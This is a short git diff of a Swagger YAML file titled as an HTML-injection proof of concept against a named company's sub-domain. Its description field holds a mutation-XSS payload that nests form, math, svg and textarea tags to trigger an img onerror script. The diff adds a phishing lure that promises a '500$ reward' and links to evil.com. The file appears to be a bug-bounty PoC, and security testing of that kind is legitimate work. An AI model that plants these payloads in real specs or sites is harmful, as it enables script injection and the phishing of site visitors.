--- a/test.yaml
+++ b/test.yaml
@@ -1,7 +1,8 @@
 swagger: '2.0'
 info:
-  title: HTML INJECTION ON GODADDY IP FOR POC
+  title: HTML INJECTION ON VISMA SUB-DOMAIN FOR POC
   description: |
+    <h1>To get free 500$ reward, please go to our patner website <h1><a href="https://evil.com">Click Here</a></h1></h1>
     <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1></form>
 
   version: production
